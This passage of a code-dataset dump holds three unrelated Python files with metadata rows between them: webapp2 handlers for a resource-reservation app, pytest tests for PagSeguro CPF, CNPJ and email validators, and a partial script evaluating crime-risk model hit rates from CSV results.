            self.redirect(users.create_login_url(self.request.uri))
            # url_linktext = 'Login'
'''
CreateResource Handler enables the function of creating a new resource
'''
class CreateResource(webapp2.RequestHandler):
    """Handles creation of a new resource (form on GET, save on POST)."""

    def get(self):
        # Render the empty new-resource form.
        template = JINJA_ENVIRONMENT.get_template('newResource.html')
        template_values = {}
        self.response.write(template.render(template_values))

    def post(self):
        resource = Resource()
        user = users.get_current_user()
        if user:
            resource.owner = user.email()
        resource.id = str(uuid.uuid4())
        resource.name = self.request.get('name')
        # Parse "HH:MM" form fields and anchor them on today's date, since
        # the datastore property stores full datetimes.
        start_time = map(int, self.request.get('available_start_time').split(':'))
        end_time = map(int, self.request.get('available_end_time').split(':'))
        resource.available_start_time = datetime.combine(datetime.today(), time(*start_time))
        resource.available_end_time = datetime.combine(datetime.today(), time(*end_time))
        # Tags are entered as a comma-space separated list.
        resource.tags = self.request.get('tags').split(', ')
        resource.num_reserved = 0
        resource.put()
        # Brief pause before redirect -- presumably so the datastore write is
        # visible when the landing page re-queries; confirm.
        t.sleep(0.1)
        self.redirect('/')
'''
ViewResource Handler handels displaying the main page for an existing resource
'''
class ViewResource(webapp2.RequestHandler):
    """Displays the main page for one resource: its upcoming reservations,
    owner, and total reservation count."""

    def get(self):
        resource_id = self.request.get('id')
        owner = Resource.query(Resource.id == resource_id).get().owner
        count = Resource.query(Resource.id == resource_id).get().num_reserved
        curr_user = users.get_current_user()
        # NOTE(review): 300-minute shift looks like a UTC -> UTC-5 local-time
        # adjustment -- confirm.
        now_time = datetime.now() - timedelta(minutes=300)
        # Only reservations that have not yet ended, soonest first.
        reservations = Reservation.query(ndb.AND(Reservation.resource_id == resource_id,
                                                 Reservation.end_time >= now_time)).fetch()
        reservations = sorted(reservations, key=lambda r: r.start_time)
        # currentUser = str(users.get_current_user().email())
        template_values = {
            'reservations': reservations,
            'curr_user': curr_user,
            'owner': owner,
            'resource_id': resource_id,
            'count':count,
        }
        template = JINJA_ENVIRONMENT.get_template('resource.html')
        self.response.write(template.render(template_values))
'''
ViewResource Handler handels the function of editing an existing resource
'''
class EditResource(webapp2.RequestHandler):
    """Handles editing an existing resource (prefilled form on GET,
    save on POST)."""

    def get(self):
        resource_id = self.request.get('id')
        resource = Resource.query(Resource.id == resource_id).get()
        start = resource.available_start_time
        end = resource.available_end_time
        template_values = {
            'id': resource_id,
            'name': resource.name,
            'available_start_time': start,
            'available_end_time': end,
            # Tags are rendered back into the comma-space form the create
            # form expects.
            'tags': ', '.join(resource.tags),
        }
        template = JINJA_ENVIRONMENT.get_template('editResource.html')
        self.response.write(template.render(template_values))

    def post(self):
        resource_id = self.request.get('id')
        resource = Resource.query(Resource.id == resource_id).get()
        resource.name = self.request.get('name')
        # today = datetime.now().date()
        # Same "HH:MM" parsing as CreateResource.post.
        start_time = map(int, self.request.get('available_start_time').split(':'))
        end_time = map(int, self.request.get('available_end_time').split(':'))
        resource.available_start_time = datetime.combine(datetime.today(), time(*start_time))
        resource.available_end_time = datetime.combine(datetime.today(), time(*end_time))
        resource.tags = self.request.get('tags').split(', ')
        resource.put()
        # Brief pause before redirect -- presumably for datastore
        # consistency; confirm.
        t.sleep(0.1)
        self.redirect('/')
'''
ViewUser Handler handels displaying the main page for an user
'''
class ViewUser(webapp2.RequestHandler):
    """Displays the profile page for a user: their reservations and the
    resources they own."""

    def get(self):
        user_email = self.request.get('email')
        # retrieve user's reservations (query object; iterated by template)
        reservation_by_curr_user = Reservation.query(Reservation.user == user_email)
        if reservation_by_curr_user:
            reservation_by_curr_user = reservation_by_curr_user.order(Reservation.start_time)
        # retrieve resources owned by this user
        resources_owned = Resource.query(Resource.owner==user_email)
        template_values = {
            'reservation_by_curr_user': reservation_by_curr_user,
            'resources_owned': resources_owned,
        }
        template = JINJA_ENVIRONMENT.get_template('user.html')
        self.response.write(template.render(template_values))
'''
CreateResservation Handler enables the function of creating a new reservation
'''
class CreateReservation(webapp2.RequestHandler):
    """Handles creating a new reservation: form on GET, validation plus
    save (and confirmation email) on POST."""

    def get(self):
        # Render the reservation form for the resource given by ?id=...
        resource_id = self.request.get('id')
        resource = Resource.query(Resource.id == resource_id).get()
        template_values = {
            'id': resource_id,
            'name': resource.name
        }
        template = JINJA_ENVIRONMENT.get_template('newReservation.html')
        self.response.write(template.render(template_values))

    def post(self):
        resource_id = self.request.get('id')
        resource_name = self.request.get('name')
        # Parse "HH:MM" and anchor it on today's date; the duration field is
        # in minutes.
        start_time = time(*map(int, self.request.get('available_start_time').split(':')))
        start_time = datetime.combine(datetime.today(), start_time)
        duration = int(self.request.get('duration'))
        resource = Resource.query(Resource.id == resource_id).get()
        end_time = start_time + timedelta(minutes=duration)
        # check time format and availability
        has_error = False
        msg = ''
        # error check
        if end_time < start_time:
            has_error = True
            msg = 'Error, wrong format of start time or duration. Please return to former page to enter correctly.'
        elif resource.available_start_time > start_time or \
            resource.available_end_time < end_time:
            has_error = True
            msg = 'Error, resource not available during the selected period. Please return to former page to enter another time period.'
        else:
            # Overlap check: conflict unless the new slot ends before an
            # existing one starts or starts after it ends.
            reservations = Reservation.query(Reservation.resource_id == resource_id).fetch()
            for r in reservations:
                if not (end_time <= r.start_time or start_time >= r.end_time):
                    has_error = True
                    msg = 'Error, reservation conflict. Please return to former page to enter another time period.'
        if has_error:
            # Re-render the form with the error message.
            template = JINJA_ENVIRONMENT.get_template('newReservation.html')
            template_values = {'msg': msg}
            self.response.write(template.render(template_values))
        else:
            # add reservation if no error
            reservation = Reservation()
            reservation.id = str(uuid.uuid4())
            reservation.user = str(users.get_current_user().email())
            reservation.start_time = start_time
            reservation.duration = duration
            reservation.end_time = end_time
            reservation.resource_id = resource_id
            reservation.resource_name = resource_name
            reservation.put()
            # NOTE(review): 300-minute shift looks like a UTC -> UTC-5
            # local-time adjustment -- confirm.
            resource.last_reservation_time = datetime.now() - timedelta(minutes=300)
            resource.num_reserved += 1
            resource.put()
            # Pause before redirect -- presumably for datastore consistency.
            t.sleep(1)
            send_mail(resource, reservation)
            self.redirect('/')
'''
CreateResservation Handler enables the function of
generating a RSS link for an existing reservation
'''
class GenerateRSS(webapp2.RequestHandler):
    """Generates an RSS/XML-style feed for one resource: its metadata plus
    one entry per reservation."""

    def get(self):
        resource_id = self.request.get('id')
        resource = Resource.query(Resource.id == resource_id).get()
        reservations = Reservation.query(Reservation.resource_id == resource_id).fetch()
        header = '<?xml version="1.0" encoding="UTF-8" ?>'
        tag_owner = '<owner>{}</owner>'.format(resource.owner)
        tag_name = '<name>{}</name>'.format(resource.name)
        tag_start = '<start_time>{}</start_time>'.format(resource.available_start_time)
        tag_end = '<end_time>{}</end_time>'.format(resource.available_end_time)
        tags_reservation = []
        for r in reservations:
            # Renamed the loop-local dict from 't' to 'entry': 't' shadowed
            # the module-level 'import time as t' alias used elsewhere in
            # this file (t.sleep), a latent bug waiting to happen.
            entry = {}
            entry['user'] = '<reservedBy>{}</reservedBy>'.format(r.user)
            entry['start'] = '<reservedAt>{}</reservedAt>'.format(r.start_time)
            tags_reservation.append(entry)
        template_values = {
            'header': header,
            'owner': tag_owner,
            'name': tag_name,
            'start_time': tag_start,
            'end_time': tag_end,
            'reservations': tags_reservation,
        }
        template = JINJA_ENVIRONMENT.get_template('rss.html')
        self.response.write(template.render(template_values))
'''
DeleteResservation Handler enables deleting an existing reservation in Landing Page
'''
class DeleteReservation(webapp2.RequestHandler):
    """Handles removal of an existing reservation from the landing page."""

    def post(self):
        """Delete the reservation named in the POST data, then go home."""
        target_id = self.request.get('reservation_id')
        target = Reservation.query(Reservation.id == target_id).get()
        target.key.delete()
        # Brief pause before redirect -- presumably so the datastore delete
        # is visible when the landing page re-queries; confirm.
        t.sleep(0.1)
        self.redirect('/')
'''
ResourceBy Handler enables the function of filtering existing resources by tag
'''
class ResourcesByTag(webapp2.RequestHandler):
    """Filters existing resources by a tag (case-insensitive match)."""

    def get(self):
        tag = self.request.get('tag').lower()
        resources = Resource.query().order(-Resource.last_reservation_time).fetch()
        filtered_resources = []
        for r in resources:
            # Normalize each tag before comparing. The comprehension variable
            # is deliberately NOT named 't': in Python 2, list-comprehension
            # variables leak into the enclosing scope and 't' would shadow
            # the module alias 'import time as t'.
            tags = [label.lower().strip() for label in r.tags]
            if tag in tags:
                filtered_resources.append(r)
        template_values = {
            'tag': tag,
            'resources': filtered_resources,
        }
        template = JINJA_ENVIRONMENT.get_template('tag.html')
        self.response.write(template.render(template_values))
'''
SearchResource Handler enables the function of searching existing resources by name
'''
class SearchResource(webapp2.RequestHandler):
    """Searches existing resources by (case-insensitive) substring of name."""

    def get(self):
        # Render the empty search form.
        template_values = {}
        template = JINJA_ENVIRONMENT.get_template('searchResource.html')
        self.response.write(template.render(template_values))

    def post(self):
        name = self.request.get('name').lower()
        resources = Resource.query().order(-Resource.last_reservation_time).fetch()
        results = []
        for r in resources:
            resource_name = r.name.strip().lower()
            if name in resource_name:
                results.append(r)
        # Removed leftover debug statement ('print resources') that dumped
        # the full result set to the server log on every search.
        template_values = {
            'name': name,
            'resources': results,
        }
        template = JINJA_ENVIRONMENT.get_template('searchResource.html')
        self.response.write(template.render(template_values))
# [START app]
# URL routing table for the WSGI app; debug=True makes webapp2 show stack
# traces in error responses.
app = webapp2.WSGIApplication([
    ('/', LandingPage),
    ('/newResource.html', CreateResource),
    ('/resource.html', ViewResource),
    ('/editResource.html', EditResource),
    ('/newReservation.html', CreateReservation),
    ('/user.html', ViewUser),
    ('/index.html', DeleteReservation),
    ('/tag.html', ResourcesByTag),
    ('/rss.html', GenerateRSS),
    ('/searchResource.html', SearchResource),
], debug=True)
# [END app]
| 39.808108 | 136 | 0.63263 | 1,630 | 14,729 | 5.552147 | 0.160736 | 0.036464 | 0.032486 | 0.027845 | 0.499558 | 0.443978 | 0.365635 | 0.330608 | 0.242762 | 0.199558 | 0 | 0.005042 | 0.259352 | 14,729 | 369 | 137 | 39.915989 | 0.824549 | 0.068233 | 0 | 0.383142 | 0 | 0.003831 | 0.106896 | 0.01376 | 0.003831 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.042146 | null | null | 0.003831 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0c6a40a4bea2c4e73231cb976a84217ada08384c | 2,098 | py | Python | tests/test_utils.py | Guillerbr/python-pagseguro | 279eacf251e99a2f15d665f8193fcad0be6ea0bf | [
"MIT"
] | 115 | 2015-02-19T22:17:44.000Z | 2019-07-24T17:31:30.000Z | tests/test_utils.py | rubens8848/python-pagseguro | 08a8aa7f934b16d00948ead17a0e470a88f2479f | [
"MIT"
] | 49 | 2015-03-04T00:53:31.000Z | 2019-07-13T16:41:22.000Z | tests/test_utils.py | rubens8848/python-pagseguro | 08a8aa7f934b16d00948ead17a0e470a88f2479f | [
"MIT"
] | 53 | 2015-01-12T22:13:33.000Z | 2019-07-20T01:52:48.000Z | # -*- coding: utf-8 -*-
import datetime
from pagseguro.utils import (is_valid_cpf, is_valid_cnpj, is_valid_email,
parse_date)
from pagseguro.exceptions import PagSeguroValidationError
import pytest
from dateutil.tz import tzutc
def test_is_valid_email():
    """Invalid addresses raise; valid ones (incl. IDN domains) are returned."""
    # Missing local part, no '@' at all, and a domain without a TLD.
    for bad_address in ('@asd.com', 'bad', u'user@росси́я'):
        with pytest.raises(PagSeguroValidationError):
            is_valid_email(bad_address)
    assert is_valid_email('test@email.com') == 'test@email.com'
    assert is_valid_email(u'user@росси́я.ро') == u'user@росси́я.ро'
def test_parse_date():
    """An ISO-8601 '%Y-%m-%dT%H:%M:%S' string parses to a UTC-aware datetime."""
    parsed = parse_date('2016-10-10T10:10:10')
    assert parsed == datetime.datetime(2016, 10, 10, 10, 10, 10,
                                       tzinfo=tzutc())
def test_is_valid_cpf():
    """Malformed, oversized, or checksum-failing CPFs raise; valid ones pass."""
    bad_cpfs = (
        'bla///',                      # not digits at all
        '1111111111111111111111111',   # too many digits
        '040.684.826-50',              # well-formed but bad check digits
    )
    for bad_cpf in bad_cpfs:
        with pytest.raises(PagSeguroValidationError):
            is_valid_cpf(bad_cpf)
    # Valid CPFs are returned as given, punctuated or not.
    assert is_valid_cpf('041.684.826-50') == '041.684.826-50'
    assert is_valid_cpf('04168482650') == '04168482650'
def test_is_valid_cnpj():
    """Bad CNPJs raise; valid ones are returned normalized to bare digits."""
    bad_cnpjs = (
        '///',              # not digits at all
        '1111111',          # too few digits
        '31331052000175',   # right length, wrong check digit
    )
    for bad_cnpj in bad_cnpjs:
        with pytest.raises(PagSeguroValidationError):
            is_valid_cnpj(bad_cnpj)
    assert is_valid_cnpj('31331052000174') == '31331052000174'
    # Punctuated input is normalized to digits only.
    assert is_valid_cnpj('72.168.117/0001-90') == '72168117000190'
| 26.897436 | 78 | 0.674452 | 259 | 2,098 | 5.227799 | 0.274131 | 0.108567 | 0.106352 | 0.265879 | 0.502954 | 0.426883 | 0.426883 | 0.121861 | 0 | 0 | 0 | 0.11253 | 0.216397 | 2,098 | 77 | 79 | 27.246753 | 0.709246 | 0.028122 | 0 | 0.173077 | 0 | 0 | 0.130157 | 0.012279 | 0 | 0 | 0 | 0 | 0.134615 | 1 | 0.076923 | false | 0 | 0.096154 | 0 | 0.173077 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0c6dab3b29d248c78a200aec1e3449a5aeb04604 | 33,383 | py | Python | sandbox/riskModelsResultsEval.py | danbirks/PredictCode | b4d7010d13706c771ba57437e9c7589e5c94329b | [
"Artistic-2.0"
] | null | null | null | sandbox/riskModelsResultsEval.py | danbirks/PredictCode | b4d7010d13706c771ba57437e9c7589e5c94329b | [
"Artistic-2.0"
] | null | null | null | sandbox/riskModelsResultsEval.py | danbirks/PredictCode | b4d7010d13706c771ba57437e9c7589e5c94329b | [
"Artistic-2.0"
] | 2 | 2020-01-28T23:02:54.000Z | 2020-02-03T16:04:38.000Z | # -*- coding: utf-8 -*-
"""
Created on Wed May 15 10:22:47 2019
@author: lawdfo
Purpose:
Read in the csv results file generated by (e.g.) riskModelsParamSweep.py
and report back some useful statistics.
"""
# Some fairly standard modules
import os, csv, lzma
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
import descartes
from itertools import product
from collections import Counter, defaultdict
import datetime
import csv
import random
import time
from copy import deepcopy
import statistics
# The geopandas module does not come standard with anaconda,
# so you'll need to run the anaconda prompt as an administrator
# and install it via "conda install -c conda-forge geopandas".
# That installation will include pyproj and shapely automatically.
# These are useful modules for plotting geospatial data.
import geopandas as gpd
import pyproj
import shapely.geometry
# These modules are useful for tracking where modules are
# imported from, e.g., to check we're using our local edited
# versions of open_cp scripts.
import sys
import inspect
import importlib
# In order to use our local edited versions of open_cp
# scripts, we insert the parent directory of the current
# file ("..") at the start of our sys.path here.
sys.path.insert(0, os.path.abspath(".."))
# Elements from PredictCode's custom "open_cp" package
import open_cp
"""
import open_cp.geometry
import open_cp.plot
import open_cp.sources.chicago as chicago
import open_cp.retrohotspot as retro
import open_cp.prohotspot as phs
import open_cp.knox
"""
# Load custom functions that make dealing with datetime and timedelta easier
from crimeRiskTimeTools import generateDateRange, \
generateLaterDate, \
generateEarlierDate, \
getTimedPointsInTimeRange, \
getSixDigitDate, \
_day
"""
Expected data format of input CSV file, by column:
Header name Type Typical contents
dataset str Chicago
event_types str BURGLARY
cell_width int 100
eval_date np.datetime64 2016-03-01
train_len str 8W
test_len str 1D
coverage_rate float 0.01/0.02/0.05/0.1
test_events int 3/2/5/etc
hit_count int 1/2/0/etc
hit_pct float 0.33333 etc
model str naivecount/phs/etc
rand_seed int
rhs_bandwidth int
phs_time_unit str 1 weeks
phs_time_band str 4 weeks
phs_dist_unit int 100
phs_dist_band int 400
phs_weight str linear
"""
# Per-column Python types for the results CSV, in the same order as the
# columns documented in the docstring above (dataset, event_types,
# cell_width, eval_date, train_len, test_len, coverage_rate, test_events,
# hit_count, hit_pct, model, rand_seed, rhs_bandwidth, phs_time_unit,
# phs_time_band, phs_dist_unit, phs_dist_band, phs_weight).
csv_data_types = [str, \
                  str, \
                  int, \
                  np.datetime64, \
                  str, \
                  str, \
                  float, \
                  int, \
                  int, \
                  float, \
                  str, \
                  int, \
                  int, \
                  str, \
                  str, \
                  int, \
                  int, \
                  str]
def splitDataByTimespans(datalist, timespan, dateinfoname="eval_date"):
    """Bucket result rows into consecutive date ranges of width *timespan*.

    Returns a dict mapping each range's start date to the list of rows
    whose *dateinfoname* value falls in [start, start + timespan).
    """
    print("Performing splitDataByTimespans")
    all_dates = sorted(set(row[dateinfoname] for row in datalist))
    # Range starts cover the full span of dates seen in the data.
    range_starts = generateDateRange(start=all_dates[0],
                                     end=all_dates[-1] + _day,
                                     step=timespan)
    buckets = defaultdict(list)
    for row in datalist:
        row_date = row[dateinfoname]
        for start in range_starts:
            if start <= row_date < generateLaterDate(start, timespan):
                buckets[start].append(row)
                break
    print("Ending splitDataByTimespans")
    return buckets
"""
Each element of output should have this info:
earliest test date of range
time band
dist band
avg hit rate
"""
def getPhsSpanStats(datalist, timespan):
    """Summarize PHS hit rates per date range and bandwidth pair.

    Returns a list of 4-tuples:
    (range start date, time bandwidth, distance bandwidth, average hit rate).
    """
    print("Performing getPhsSpanStats")
    buckets = splitDataByTimespans(datalist, timespan)
    summary = []
    for range_start in buckets:
        rates_by_band = getPhsHitRates(buckets[range_start])
        summary.extend(
            (range_start, band[0], band[1], rates_by_band[band]["avg_hit_rate"])
            for band in rates_by_band
        )
    print("Ending getPhsSpanStats")
    return summary
def getModelSpanStats(datalist, timespan, model):
    """Per-date-range hit-rate statistics for one model type.

    "phs" results are delegated to getPhsSpanStats; the other recognized
    models yield a list of (range start date, average hit rate) pairs.
    Exits the program if *model* is not recognized.
    """
    print("Performing getModelSpanStats")
    if model not in ("random", "naive", "ideal", "phs"):
        print("model required for getModelSpanStats")
        sys.exit(1)
    if model == "phs":
        # NOTE: returns here without printing the "Ending" trace line,
        # matching the original control flow.
        return getPhsSpanStats(datalist, timespan)
    stats = [(range_start, getAvgHitRates(rows))
             for range_start, rows
             in splitDataByTimespans(datalist, timespan).items()]
    print("Ending getModelSpanStats")
    return stats
"""
Each element of output should have this info:
coverage
earliest test date of range
time band
dist band
avg hit rate
"""
def writeModelSummaryCsv(datalists_by_cov, timespan, model, csvname = "temp.csv"):
    """Write per-coverage model summaries to *csvname*, then exit.

    Each row is: coverage followed by the fields from getModelSpanStats
    (for PHS: range start, time band, dist band, avg hit rate).
    """
    print("Performing writeModelSummaryCsv")
    rate_summaries_by_cov = dict()
    for cov, datalist in datalists_by_cov.items():
        rate_summaries_by_cov[cov] = getModelSpanStats(datalist, timespan, model)
    with open(csvname,"w") as csvf:
        writer = csv.writer(csvf, delimiter=",", lineterminator="\n")
        for cov, rate_summary in rate_summaries_by_cov.items():
            for d in rate_summary:
                writer.writerow([cov] + list(d))
    print("Ending writeModelSummaryCsv")
    # NOTE(review): terminates the whole script after writing -- presumably
    # intentional for this sandbox workflow, but surprising for a utility
    # function; confirm before reusing from other code.
    sys.exit(0)
def writePhsVariabilityCsv(datalists_by_cov, timespan, csvname="temp.csv"):
    """Write per-(coverage, time band, dist band) hit-rate variability stats.

    For every (coverage, time band, dist band) trio, collects the avg hit
    rates over all timespans and writes one csv row of
    (cov, time, dist, mean, stdev, variance). Exits with status 1 if the
    trios do not all have the same number of rates, and exits 0 when done.
    """
    print("Performing writePhsVariabilityCsv")
    bp_rate_summaries_by_cov = dict()
    for cov, datalist in datalists_by_cov.items():
        bp_rate_summaries_by_cov[cov] = getPhsSpanStats(datalist, timespan)
    # Group every avg hit rate by its (coverage, time band, dist band) trio.
    rates_by_covtimedist = defaultdict(list)
    for cov, rate_summary in bp_rate_summaries_by_cov.items():
        for entry in rate_summary:
            rates_by_covtimedist[(cov, entry[1], entry[2])].append(entry[3])
    covtimedist_trios = sorted(rates_by_covtimedist)
    num_rates_list = [len(rates_by_covtimedist[x]) for x in covtimedist_trios]
    num_rates = num_rates_list[0]
    if not all(x == num_rates for x in num_rates_list):
        print("Error! Not all (cov, time, dist) trios have same number of results!")
        print(num_rates_list)
        sys.exit(1)
    ratestats_by_covtimedist = dict()
    for covtimedist in covtimedist_trios:
        ratelist = rates_by_covtimedist[covtimedist]
        rate_avg = sum(ratelist) / num_rates
        # Robustness fix: statistics.stdev/variance raise StatisticsError
        # for fewer than two samples; report zero spread in that case.
        if num_rates > 1:
            rate_std = statistics.stdev(ratelist)
            rate_var = statistics.variance(ratelist)
        else:
            rate_std = 0.0
            rate_var = 0.0
        ratestats_by_covtimedist[covtimedist] = (rate_avg, rate_std, rate_var)
    with open(csvname, "w") as csvf:
        writer = csv.writer(csvf, delimiter=",", lineterminator="\n")
        for covtimedist, ratestats in ratestats_by_covtimedist.items():
            writer.writerow(list(covtimedist) + list(ratestats))
            print(" ".join(str(x) for x in list(covtimedist) + list(ratestats)))
    print("Ending writePhsVariabilityCsv")
    sys.exit(0)
def checkPhsConsistency(datalist, timespan, topnum):
    """Check whether the same PHS bandwidth pairs stay top-ranked over time.

    Parameters:
        datalist: list of PHS result-row dicts.
        timespan: how frequently to check scores (e.g. top models per day,
            or averaged over each month, etc).
        topnum: how many of the top bandwidth pairs count as "successful";
            entries tied with the last kept avg hit rate are also included.
    """
    print("Performing checkPhsConsistency")
    data_by_daterange = splitDataByTimespans(datalist, timespan)
    best_avgrate_bps = []
    for daterange in data_by_daterange:
        # Bug fix: the dict was being *called* (data_by_daterange(daterange));
        # it must be indexed.
        rate_info = getPhsHitRates(data_by_daterange[daterange])
        d_sort_avgrate = sorted(rate_info.items(),
                                key=lambda ri: ri[1]["avg_hit_rate"],
                                reverse=True)
        best_bp_avgrate = d_sort_avgrate[:topnum]
        # Extend past topnum while entries tie the last kept avg hit rate.
        for d in d_sort_avgrate[topnum:]:
            if d[1]["avg_hit_rate"] < best_bp_avgrate[-1][1]["avg_hit_rate"]:
                break
            best_bp_avgrate.append(d)
        best_avgrate_bps.append(best_bp_avgrate)
    # Fix: pass a list (not a dict view) so it can be indexed downstream.
    findMinimalPhsBandCovering(best_avgrate_bps, list(data_by_daterange.keys()))
def findMinimalPhsBandCovering(best_bps, daterange_list):
    """Greedily partition consecutive dateranges into spans whose top
    bandwidth pairs share at least one common member.

    Parameters:
        best_bps: per-daterange lists of (bandwidth_pair, info) tuples.
        daterange_list: dateranges aligned with best_bps. Robustness fix:
            any iterable (including dict.keys(), as passed by
            checkPhsConsistency) is accepted and converted to a list so it
            can be indexed.

    Prints the span lengths, the dates in each span, the covering
    bandwidth sets, and the min/max span length. Returns None.
    """
    print("Performing findMinimalPhsBandCovering")
    daterange_list = list(daterange_list)
    covered_span_list = []
    covered_span_dates = [[]]
    covering_bps = []
    # Running intersection of top bandwidth pairs for the current span.
    bp_set = set(x[0] for x in best_bps[0])
    running_span_count = 0
    for i, bp_info in enumerate(best_bps):
        new_bp_set = bp_set & set(x[0] for x in bp_info)
        if len(new_bp_set) == 0:
            # No common bp remains: close the current span, start a new one.
            covered_span_list.append(running_span_count)
            running_span_count = 1
            covered_span_dates.append([])
            covering_bps.append(deepcopy(bp_set))
            bp_set = set(x[0] for x in bp_info)
        else:
            bp_set = new_bp_set
            running_span_count += 1
        covered_span_dates[-1].append(daterange_list[i])
    # Close out the final span.
    covered_span_list.append(running_span_count)
    covering_bps.append(deepcopy(bp_set))
    print(covered_span_list)
    print(covered_span_dates)
    print(covering_bps)
    sorted_covered_span_list = sorted(covered_span_list)
    print(sorted_covered_span_list[0])
    print(sorted_covered_span_list[-1])
"""
getPhsHitRates
Input: "datalist" = list where each entry is a dictionary containing the
information from a line of the csv results file (casted
as the appropriate data type) as well as "param_pair"
which is a tuple of the time and dist bandwidths.
Note: Ideally this datalist is a subset of the full csv data, so that
hit rates are calculated over smaller timespans, e.g. monthly
Output: "info_by_band_pair" = dict that maps bandwidth pairs ("bp") to:
"bands": same as key; can be useful if just grabbing values
"num_tests": Number of experiments/tests/evaluations performed.
All bp's within a datalist fed into this function should end
up with the same number of tests -- I can't think of a reason
why this wouldn't happen. However, note that this number MAY
change across multiple runs of this function with different
data subsets. For example, maybe you calculate over every
month, but months have different numbers of days.
"total_events": Total number of events (i.e. crimes) in the data.
This is calculated by adding the number for the first time
each date is witnessed. So again, it's important that all bp's
are tested on all the same days.
"total_hits": Total number of hits achieved by the bp's model.
"total_rates": Sum of all daily(?) hit rates. This number is
essentially useless on its own, but used for calculating avg.
"avg_hit_rate": Average of all daily hit rates, calculated as
total_rates/num_tests
("overall_hit_rate"): A different average hit rate, being the total
number of hits divided by the total number of events. This
was removed from use (commented out) once we decided this
metric was less useful than avg_hit_rate, since this could be
swayed by a generally poor model that rarely performs extremely
well.
"""
def getPhsHitRates(datalist):
    """Aggregate PHS results into per-bandwidth-pair hit-rate statistics.

    Each element of datalist is a dict for one csv row, including a
    "param_pair" tuple of (time bandwidth, dist bandwidth).

    Returns a dict mapping each bandwidth pair to a dict with keys
    "bands", "num_tests", "total_events", "total_hits", "total_rates",
    and "avg_hit_rate" (= total_rates / num_tests). Exits with status 1
    if the bandwidth pairs were not all evaluated the same number of
    times.
    """
    print("Performing getPhsHitRates")
    # One stats record per distinct bandwidth pair, in sorted order.
    info_by_band_pair = {
        bands: {
            "bands": bands,
            "num_tests": 0,
            "total_events": 0,
            "total_hits": 0,
            "total_rates": 0.0,
        }
        for bands in sorted({d["param_pair"] for d in datalist})
    }
    # Accumulate running counts from every result row.
    for result in datalist:
        record = info_by_band_pair[result["param_pair"]]
        record["num_tests"] += 1
        record["total_events"] += result["test_events"]
        record["total_hits"] += result["hit_count"]
        # Days with zero events contribute nothing to the rate sum.
        if result["test_events"] > 0:
            record["total_rates"] += result["hit_count"] / result["test_events"]
    # Every bandwidth pair must have been tested the same number of times.
    test_counts = [info_by_band_pair[bands]["num_tests"] for bands in info_by_band_pair]
    if len(set(test_counts)) != 1:
        print("Error! Some bandwidth pairs have different numbers of tests!")
        print(Counter(test_counts))
        sys.exit(1)
    num_tests = test_counts[0]
    # Average hit rate = sum of per-test rates over the shared test count.
    for record in info_by_band_pair.values():
        record["avg_hit_rate"] = record["total_rates"] / num_tests
    return info_by_band_pair
def getAvgHitRates(datalist):
    """Return the average per-test hit rate over a list of result rows.

    Note: 0 hits for 0 events counts as a hit rate of 0 (the test still
    counts toward the denominator). Robustness fix: an empty datalist now
    returns 0.0 instead of raising ZeroDivisionError.
    """
    print("Performing getAvgHitRates")
    num_tests = len(datalist)
    if num_tests == 0:
        return 0.0
    total_rates = sum(result["hit_count"] / result["test_events"]
                      for result in datalist if result["test_events"] != 0)
    # Debug dump of every row and its individual hit rate.
    for result in datalist:
        print(result)
        hits, events = result["hit_count"], result["test_events"]
        rate = hits / events if events else 0
        print("\t".join(str(x) for x in (hits, events, rate)))
    print(total_rates / num_tests)
    return total_rates / num_tests
"""
getDataByCovRate
Given a path to csv results from running risk models,
return a dictionary where keys are coverage rates and
values are the rows of info with that coverage from the csv.
"""
def getDataByCovRate(results_full_path,
                     header_types=None,
                     earliest_eval_date=None,
                     latest_eval_date=None,
                     ):
    """Read a risk-model results csv and group the rows by coverage rate.

    Parameters:
        results_full_path: path to the csv results file.
        header_types: per-column casting callables aligned with the csv
            header; defaults to the module-level csv_data_types. (Fix:
            the default is now resolved at call time rather than being
            evaluated when the function is defined.)
        earliest_eval_date: keep only rows with eval_date >= this.
        latest_eval_date: keep only rows with eval_date <= this.

    Returns a 4-tuple:
        (cov -> model_param_name -> list of row dicts,
         eval dates in first-seen order,
         model_param_names in first-seen order,
         sorted list of coverage rates)
    """
    if header_types is None:
        header_types = csv_data_types
    total_event_count = 0
    dates_seen = []
    dates_seen_set = set()  # O(1) membership; dates_seen keeps first-seen order
    model_param_names = []
    cov_rates = set()
    # cov rate -> model name -> list of row dicts (one per csv line)
    datadicts_by_cov_rate = defaultdict(lambda: defaultdict(list))
    with open(results_full_path, newline="") as f:
        reader = csv.reader(f)
        # Column names come from the header in the first line.
        header = next(reader, None)
        for dataline in reader:
            dataline_dict = dict()
            # Cast each raw string cell with its column's type. Empty cells
            # stay "" because e.g. int("") would raise.
            for i, d in enumerate(dataline):
                dataline_dict[header[i]] = header_types[i](d) if d != "" else ""
            # Skip rows outside the requested date window.
            dataline_date = dataline_dict["eval_date"]
            if earliest_eval_date is not None and dataline_date < earliest_eval_date:
                continue
            if latest_eval_date is not None and latest_eval_date < dataline_date:
                continue
            # Count each evaluation date's events only once.
            if dataline_date not in dates_seen_set:
                total_event_count += dataline_dict["test_events"]
                dates_seen_set.add(dataline_date)
                dates_seen.append(dataline_date)
            dataline_cov = dataline_dict["coverage_rate"]
            cov_rates.add(dataline_cov)
            dataline_model = dataline_dict["model"]
            # PHS rows carry bandwidths; store them as a "param_pair" tuple.
            if dataline_model == "phs":
                time_band = int(dataline_dict["phs_time_band"][:-1])
                dist_band = dataline_dict["phs_dist_band"]
                dataline_dict["param_pair"] = (time_band, dist_band)
            # Build a per-run model name (random gets its seed, phs its bands).
            model_param_name = dataline_model
            if dataline_model == "random":
                model_param_name += "-" + str(dataline_dict["rand_seed"])
            elif dataline_model == "phs":
                model_param_name += "-" + "-".join(str(x) for x in dataline_dict["param_pair"])
